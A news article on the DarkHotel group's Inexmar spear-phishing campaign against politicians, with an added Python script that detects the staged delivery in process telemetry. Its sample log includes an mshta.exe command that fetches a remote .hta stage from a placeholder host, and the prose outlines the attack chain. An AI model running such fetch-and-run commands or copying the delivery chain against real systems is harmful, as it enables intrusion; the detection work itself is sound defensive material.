The group known as “DarkHotel” has returned to hack and spy on high-value victims once again.
The group has been active for over 10 years now, using the Wi-Fi connections in luxury hotels all over the world to hack into the computers of business travelers and attack them with malware.
The way the group works is that they compromise the hotel Wi-Fi hotspots in order to be able to deliver the payload to their selected targets. The exact way of doing this is still unknown, but some cybersecurity experts think it could have something to do with either exploiting vulnerabilities in server software or infiltrating the hotel and having physical access to the machines.
The people behind the group have regularly updated their tactics and malware payloads so they can keep spying on high-value victims such as CEOs and other senior corporate officials. They usually combine phishing and social engineering with complex Trojans to do so.
This time around, DarkHotel’s interests are different: the group now appears to be targeting politicians using a new form of malware called Inexmar. The malware was analyzed by researchers at Bitdefender, who connected it to the DarkHotel group by finding similarities with the payloads the group had delivered before.
Like many others of its kind, the Inexmar attack starts with carefully personalized spear-phishing emails that appear credible and relevant to their target. Bogdan Botezatu, senior e-threat analyst at Bitdefender, told ZDNet that this requires the phishing email to be crafted very carefully and aimed at only one person at a time.
It is still unknown who the actual target of these attacks is, and the researchers cannot tell much from the malware sample they obtained, but the phishing emails appear to point toward government officials and politicians.
The email contains a self-extracting archive package named winword.exe which starts off the Trojan downloader process when opened.
The downloader then opens a Word document named ‘Pyongyang Directory Group email SEPTEMBER 2016 RC_Office_Coordination_Associate.docx’ so that the victim does not become suspicious. The document contains fake contacts in the North Korean capital as well as references to some major organizations. It even warns the reader about malicious attacks.
To keep the malware undetected, it is downloaded in stages, which is a signature of attacks executed by DarkHotel.
The malware then runs mshta.exe, the legitimate Microsoft HTML Application host used to execute .HTA files, to download the second part of the payload, compromising the target with the Trojan.
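Two of the behaviours described above are visible in ordinary endpoint process-creation telemetry: an executable named winword.exe running from a user-writable location (the self-extracting archive from the email) and mshta.exe being used to fetch a second stage from a remote URL. The following detection script is an added example written for this article; it is not code from Bitdefender, ZDNet or the researchers, and the JSON event lines, paths and the example.invalid URL it runs over are constructed for illustration.

```python
"""Flag process-creation events matching the staged delivery described above.

Heuristic 1: a binary named like an Office executable (winword.exe, ...) that
             runs from outside the trusted install directories.
Heuristic 2: mshta.exe launched with a remote URL on its command line, or
             spawned by an Office-named (or untrusted-path) parent process.
"""
import json
import ntpath
import re

# Directories from which genuine Office and Windows binaries are expected to run.
TRUSTED_PREFIXES = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\",
)
OFFICE_NAMES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample telemetry (JSON lines), not real logs. Event 1340 models the
# winword.exe self-extracting archive launched from the mail client; 1355 models
# mshta.exe fetching the second stage; 1201 and 1402 are benign controls.
SAMPLE_LOG = [
    r'{"pid": 1201, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "WINWORD.EXE /n quarterly.docx"}',
    r'{"pid": 1340, "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\winword.exe", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "cmdline": "winword.exe"}',
    r'{"pid": 1355, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Users\\alice\\AppData\\Local\\Temp\\winword.exe", "cmdline": "mshta.exe http://example.invalid/stage2.hta"}',
    r'{"pid": 1402, "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "mshta.exe C:\\Users\\alice\\Documents\\dashboard.hta"}',
]


def _basename(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def _from_trusted_dir(path):
    """True if the image lives under one of the trusted install directories."""
    return path.lower().startswith(TRUSTED_PREFIXES)


def classify(event):
    """Return the list of reasons a single process-creation event looks suspicious."""
    reasons = []
    image = event.get("image", "")
    parent = event.get("parent_image", "")
    cmdline = event.get("cmdline", "")
    name = _basename(image)
    parent_name = _basename(parent)

    # Heuristic 1: Office-named binary outside Program Files / Windows.
    if name in OFFICE_NAMES and not _from_trusted_dir(image):
        reasons.append("office-named binary outside trusted install path")

    # Heuristic 2: mshta.exe acting as a downloader or loader.
    if name == "mshta.exe":
        if URL_RE.search(cmdline):
            reasons.append("mshta.exe given a remote URL on its command line")
        if parent_name in OFFICE_NAMES or not _from_trusted_dir(parent):
            reasons.append("mshta.exe spawned by %s" % (parent_name or "unknown parent"))
    return reasons


def analyze(lines):
    """Parse JSON-lines telemetry and return findings for every suspicious event."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed telemetry rather than crash the pipeline
        reasons = classify(event)
        if reasons:
            findings.append({"pid": event.get("pid"),
                             "image": event.get("image"),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding["pid"], finding["image"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run against the constructed sample, the script flags the winword.exe copy in the user's Temp directory and the mshta.exe instance that both carries a URL and was spawned by that copy, while the genuine Word process and a locally launched .HTA stay silent. The same two heuristics map directly onto Sysmon event ID 1 or EDR process-start records, where the parent and command-line fields are the ones worth alerting on.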
Malware researchers Cristina Vatamanu, Alexandru Rusu, and Alexandru Maximciuc wrote a paper on the method, noting that compromising a target this way not only ensures the malware stays up to date but also gives the attacker more flexibility in how the malware is distributed.
Given the sophistication of its tradecraft and the importance of the victims targeted so far, DarkHotel appears to be state-backed and to have serious skills and resources, Botezatu says.